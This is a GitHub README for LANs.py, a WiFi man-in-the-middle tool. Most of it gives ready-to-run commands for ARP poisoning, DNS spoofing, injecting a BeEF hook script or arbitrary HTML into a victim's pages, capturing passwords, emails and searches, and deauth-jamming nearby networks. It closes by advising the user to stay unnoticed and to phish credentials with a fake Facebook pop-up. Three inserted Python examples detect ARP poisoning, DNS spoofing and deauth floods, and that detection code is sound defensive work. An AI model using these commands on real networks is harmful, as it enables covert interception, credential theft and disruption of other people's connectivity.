DanMcInerney/LANs.py GitHub
Inject code, jam wifi, and spy on wifi users
Latest commit 5a17c83146: Update README.md (DanMcInerney authored on Mar 4)
If you have any issues running this script I'd suggest checking out MITMf which does all the same things + more. Eventually this script needs to be rewritten with net-creds as the engine.
LANs.py
Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit.
Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays most of the interesting bits of their traffic and can inject custom HTML into pages they visit. Cleans up after itself.
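The poisoning described above leaves a visible trace on the targeted host: the router and DNS server entries in its neighbour table point at one MAC address. The following check is an added example, not part of LANs.py; it parses `ip neigh` style output (the sample table and MAC addresses are constructed) and reports every IP that shares the gateway's MAC.

```python
import re
from collections import defaultdict

# Constructed sample of `ip neigh` output on a poisoned host: the router (.1)
# and DNS server (.2) both map to the MAC that also belongs to 192.168.0.5,
# the attacking machine in the README's examples.
SAMPLE_NEIGH = """\
192.168.0.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.0.2 dev wlan0 lladdr 00:11:22:33:44:55 STALE
192.168.0.5 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.0.20 dev wlan0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
192.168.0.30 dev wlan0  FAILED
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+(?P<dev>\S+)\s+"
    r"lladdr\s+(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\s+(?P<state>\S+)",
    re.IGNORECASE,
)

def parse_neigh(text):
    """Return [(ip, dev, mac)] for entries that carry a link-layer address."""
    entries = []
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries have no lladdr and are skipped
            entries.append((m["ip"], m["dev"], m["mac"].lower()))
    return entries

def shared_macs(entries):
    """Map (dev, mac) -> sorted IPs for every MAC that answers for 2+ IPs."""
    by_mac = defaultdict(set)
    for ip, dev, mac in entries:
        by_mac[(dev, mac)].add(ip)
    return {k: sorted(v) for k, v in by_mac.items() if len(v) > 1}

def gateway_suspect(entries, gateway_ip):
    """IPs sharing the gateway's MAC; non-empty is consistent with poisoning."""
    for ips in shared_macs(entries).values():
        if gateway_ip in ips:
            return [ip for ip in ips if ip != gateway_ip]
    return []

if __name__ == "__main__":
    print(gateway_suspect(parse_neigh(SAMPLE_NEIGH), "192.168.0.1"))
```

A host with several IP aliases on one interface shares a MAC legitimately, so treat a hit as a lead to verify against the router's real MAC rather than as proof.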
Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously.
Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, tcpdump, and a wireless card capable of promiscuous mode if you don't know the IP of your target.
Tested on Kali. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.
All options:
Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
               [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]
               [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP]
               [-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL]
               [-m MAXIMUM] [-no] [-t TIMEINTERVAL] [--packets PACKETS]
               [--directedonly] [--accesspoint ACCESSPOINT]
https://github.com/DanMcInerney/LANs.py
1/5
4/11/2015
Usage
Common usage:
python LANs.py -u -p
Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof.
Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received. Screenshot: http://i.imgur.com/kQofTYP.png
Running LANs.py without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer.
Another common usage:
python LANs.py -u -p -d -ip 192.168.0.10
-d: open an xterm with driftnet to see all images they view
-ip: target this IP address and skip the active targeting at the beginning
HTML injection:
python LANs.py -b http://192.168.0.5:3000/hook.js
Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. This just wraps the argument in <script> tags so you can really enter any location of a javascript file. Attempts to insert it after the first tag found in the page's HTML.
python LANs.py -c '<title>Owned.</title>'
Inject arbitrary HTML into pages the victim visits. First tries to inject it after the first <head> tag and failing that, injects prior to the first </head> tag. This example will change the page title to 'Owned.'
Read from pcap:
python LANs.py -pcap libpcapfilename -ip 192.168.0.10
To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway. One advantage of reading from a pcap file is that you do not need to be root to execute the script.
DNS spoofing
python LANs.py -a -r 80.87.128.67
python LANs.py -dns eff.org
Example 1: The -a option will spoof every single DNS request the victim makes and when used in conjunction with -r it will redirect them to -r's argument address. The victim will be redirected to stallman.org (80.87.128.67) no matter what they type in the address bar.
Example 2: This will spoof the domain eff.org and subdomains of eff.org. When there is no -r argument present with the -a or -dns arguments the script will default to sending the victim to the attacker's IP address. If the victim tries to go to eff.org they will be redirected to the attacker's IP.
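Both spoofing modes described above are visible in a resolver log from the affected client. This added example (not part of LANs.py) flags public names answered with private addresses and single addresses answered for several unrelated domains; the log rows, the `.corp.example` internal zone and the threshold are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed resolver log: (queried name, A record returned).
# The first three rows mimic the all-requests mode with a redirect address,
# the fourth mimics one spoofed domain answered with a LAN address.
SAMPLE_ANSWERS = [
    ("www.example.com", "80.87.128.67"),
    ("mail.example.net", "80.87.128.67"),
    ("news.example.org", "80.87.128.67"),
    ("eff.org", "192.168.0.5"),
    ("intranet.corp.example", "10.1.2.3"),
]

INTERNAL_SUFFIXES = (".corp.example",)  # hypothetical internal zone

def base_domain(name):
    """Naive registrable domain: last two labels (no public-suffix list)."""
    return ".".join(name.rstrip(".").lower().split(".")[-2:])

def private_answers(answers, internal=INTERNAL_SUFFIXES):
    """Public names that resolved to private (RFC 1918 etc.) addresses."""
    return [(name, addr) for name, addr in answers
            if ipaddress.ip_address(addr).is_private
            and not name.lower().endswith(internal)]

def converging_answers(answers, min_domains=3):
    """Addresses returned for >= min_domains unrelated base domains."""
    seen = defaultdict(set)
    for name, addr in answers:
        seen[addr].add(base_domain(name))
    return {a: sorted(d) for a, d in seen.items() if len(d) >= min_domains}

if __name__ == "__main__":
    print(private_answers(SAMPLE_ANSWERS))
    print(converging_answers(SAMPLE_ANSWERS))
```

Shared hosting and CDNs also put unrelated domains on one address, so the convergence check is a lead to verify with a trusted resolver, not a verdict.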
Most aggressive usage:
python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 1
Jam all WiFi networks:
python LANs.py --jam
Jam just one access point (router)
python LANs.py --jam --accesspoint 01:MA:C0:AD:DY
All options:
Normal Usage:
-b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
-c 'HTML CODE': inject arbitrary HTML code into pages the victim visits; include the quotes when selecting HTML to inject
-d: open an xterm with driftnet to see all images they view
-dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com
-a: Spoof every DNS response the victim makes, effectively creating a captive portal page; -r option can be used with this
-r IPADDRESS: only to be used with the -dns DOMAIN option; redirect the user to this IPADDRESS when they visit DOMAIN
-u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting
-i INTERFACE: specify interface; default is first interface in ip route, eg: -i wlan0
-ip: target this IP address
-n: performs a quick nmap scan of the target
-na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
-p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received
-pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument
-rmac ROUTER_MAC: enter router MAC here if you're having trouble getting the script to automatically fetch it
-rip ROUTER_IP: enter router IP here if you're having trouble getting the script to automatically fetch it
-v: show verbose URLs which do not truncate at 150 characters like -u
--jam: jam all or some 2.4GHz wireless access points and clients in range; use arguments below in conjunction with this argument if necessary
Wifi Jamming:
-s MAC_Address_to_skip: Specify a MAC address to skip deauthing. Example: -s 00:11:BB:33:44:AA
-ch CHANNEL: Limit wifi jammer to single channel
-m MAXIMUM: Maximum number of clients to deauth. Use if moving around so as to prevent deauthing client/AP pairs outside of current range.
-no: Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n
-t TIME_INTERVAL: Time between each deauth packet. Default is maximum. If you see scapy errors like 'no buffer space' try: -t .00001
--packets NUMBER: Number of packets to send in each deauth burst. Default is 1 packet.
--directedonly: Don't send deauth packets to the broadcast address of APs and only send to client/AP pairs
--accesspoint ROUTER_MAC: Enter the MAC address of a specific AP to target.
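For detection of the deauthentication bursts these options control, the added example below (not part of LANs.py) parses raw 802.11 management headers and flags any AP/destination pair that exceeds a rate threshold. It assumes frames with the radiotap header already stripped; the frames, MAC addresses and the threshold of 10 per second are constructed.

```python
import struct
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_deauth(frame):
    """Parse a bare 802.11 header; return None unless it is a deauth frame."""
    if len(frame) < 26:
        return None
    fc = frame[0]
    # version (bits 0-1) == 0, type (bits 2-3) == 0 management, subtype == 12
    if fc & 0x03 or (fc >> 2) & 0x03 or (fc >> 4) != 12:
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return {"dst": mac(frame[4:10]), "src": mac(frame[10:16]),
            "bssid": mac(frame[16:22]), "reason": reason}

def flood_alerts(timed_frames, threshold=10, window=1.0):
    """Sorted (bssid, dst) pairs with >= threshold deauths inside `window` s."""
    recent, alerts = defaultdict(deque), set()
    for ts, frame in timed_frames:
        d = parse_deauth(frame)
        if d is None:
            continue
        q = recent[(d["bssid"], d["dst"])]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps older than the window
            q.popleft()
        if len(q) >= threshold:
            alerts.add((d["bssid"], d["dst"]))
    return sorted(alerts)

def build(fc, dst, src, bssid, reason=7):
    """Constructed test frame: FC, duration, 3 addresses, seq, reason code."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return (bytes([fc, 0, 0, 0]) + raw(dst) + raw(src) + raw(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))

AP, STA = "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01"  # constructed addresses
# Constructed capture: 20 broadcast deauths in 0.2 s, one isolated directed
# deauth, and a beacon (FC 0x80) that the parser must ignore.
CAPTURE = [(i * 0.01, build(0xC0, BROADCAST, AP, AP)) for i in range(20)]
CAPTURE += [(5.0, build(0xC0, STA, AP, AP, reason=3)),
            (5.1, build(0x80, BROADCAST, AP, AP))]

if __name__ == "__main__":
    print(flood_alerts(CAPTURE))
```

This only detects; enabling 802.11w protected management frames on the AP and its clients is the mitigation, since it lets clients reject unauthenticated deauth frames.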
Cleanup
Upon receiving a Ctrl-C:
Turns off IP forwarding
Flushes iptables firewall
Individually restores the router and victim's ARP tables
Technical details
This script uses a python nfqueue-bindings queue wrapped in a Twisted IReadDescriptor to feed packets to callback functions. nfqueue-bindings is used to drop and forward certain packets. Python's scapy library does the work to parse and inject packets.
Injecting code undetected is a dicey game, if a minor thing goes wrong or the server the victim is requesting data from performs things in unique or rare way then the user won't be able to open the page they're trying to view and they'll know something's up. This script is designed to forward packets if anything fails so during usage you may see lots of "[!] Injected packet for www.domain.com" but only see one or two domains on the BeEF panel that the browser is hooked on. This is OK. If they don't get hooked on the first page just wait for them to browse a few other pages. The goal is to be unnoticeable. My favorite BeEF tools are in Commands > Social Engineering. Do things like create an official looking Facebook pop up saying the user's authentication expired and to re-enter their credentials.
danmcinerney.org